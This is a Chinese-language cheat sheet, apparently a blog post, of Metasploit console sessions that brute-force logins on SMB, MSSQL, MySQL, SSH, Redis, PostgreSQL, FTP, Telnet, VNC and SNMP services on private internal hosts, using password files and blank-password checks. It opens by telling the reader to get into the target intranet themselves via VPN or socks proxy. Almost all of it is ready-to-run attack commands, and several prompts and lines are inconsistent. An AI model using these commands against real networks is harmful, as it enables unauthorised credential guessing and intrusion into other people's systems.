MSF服务爆破
此处自行解决如何进入内网,可vpn可socks代理
SMB爆破
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/smb/smb_login) > set smbuser administrator
smbuser => administrator
msf5 auxiliary(scanner/smb/smb_login) > set smbdomain .
smbdomain => .
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/smb/smb_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/smb/smb_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/smb/smb_login) > run
Mssql 爆破
msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.3.144,73
rhosts => 192.168.3.144,73
msf5 auxiliary(scanner/mssql/mssql_login) > set use sa
use => sa
msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/mssql/mssql_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/mssql/mssql_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/mssql/mssql_login) > run
Mysql爆破
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/scanner/mysql/mysql_login
msf5 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.3.144,73
rhosts => 192.168.3.144,73
msf5 auxiliary(scanner/mysql/mysql_login) > set username root
username => root
msf5 auxiliary(scanner/mysql/mysql_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/mysql/mysql_login) > set threads 3
threads => 3
msf5 auxiliary(scanner/mysql/mysql_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/mysql/mysql_login) > exploit
Linux ssh爆破
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set bruteforce_speed 10
bruteforce_speed => 10
msf5 auxiliary(scanner/ssh/ssh_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
Redis爆破
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/redis/redis_login
msf5 auxiliary(scanner/redis/redis_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/redis/redis_login) > set pass
set pass_file set password
msf5 auxiliary(scanner/redis/redis_login) > set password admin!@#45
password => admin!@#45
msf5 auxiliary(scanner/redis/redis_login) > unset PASS_FILE
Unsetting PASS_FILE...
Postgresql爆破
msf5 auxiliary(scanner/redis/redis_login) > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/postgres/postgres_login) > set user postgres
user => postgres
msf5 auxiliary(scanner/postgres/postgres_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/postgres/postgres_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/postgres/postgres_login) > set bruteforce_speed 5
bruteforce_speed => 5
msf5 auxiliary(scanner/postgres/postgres_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/postgres/postgres_login) > exploit
Ftp爆破
msf5 auxiliary(scanner/vnc/vnc_login) > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/ftp/ftp_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/ftp/ftp_login) > set bruteforce_speed 3
bruteforce_speed => 3
msf5 auxiliary(scanner/ftp/ftp_login) > run
Telnet爆破
msf5 auxiliary(scanner/telnet/telnet_login) > set rhosts file:/home/yang/host.txt
rhosts => file:/home/yang/host.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set user_file /home/yang/user.txt
user_file => /home/yang/user.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set pass_file /home/yang/pass.txt
pass_file => /home/yang/pass.txt
msf5 auxiliary(scanner/telnet/telnet_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/telnet/telnet_login) > set bruteforce_speed 5
bruteforce_speed => 5
msf5 auxiliary(scanner/telnet/telnet_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/telnet/telnet_login) > run
Vnc爆破
msf5 auxiliary(scanner/telnet/telnet_login) > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > set password admin!@#45
password => admin!@#45
msf5 auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.3.130
rhosts => 192.168.3.130
msf5 auxiliary(scanner/vnc/vnc_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/vnc/vnc_login) > run
Snmp爆破
msf5 auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/snmp/snmp_login
msf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.3.142,144,73,130
rhosts => 192.168.3.142,144,73,130
msf5 auxiliary(scanner/snmp/snmp_login) > unset PASS_FILE
Unsetting PASS_FILE...
msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10
threads => 10
msf5 auxiliary(scanner/snmp/snmp_login) > set password public
password => public
msf5 auxiliary(scanner/snmp/snmp_login) > set bruteforce_speed 3
bruteforce_speed => 3
msf5 auxiliary(scanner/snmp/snmp_login) > run
联系邮箱:yang_s1r@163.com
博客园地址:https://www.cnblogs.com/Yang34/
